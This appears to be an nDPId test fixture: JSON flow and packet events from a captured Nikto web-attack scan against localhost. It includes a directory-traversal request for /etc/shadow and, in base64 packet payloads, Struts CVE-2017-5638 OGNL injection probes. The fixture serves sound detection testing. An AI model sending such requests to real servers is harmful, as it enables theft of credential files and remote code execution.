00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="}
01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="}
01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"}
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
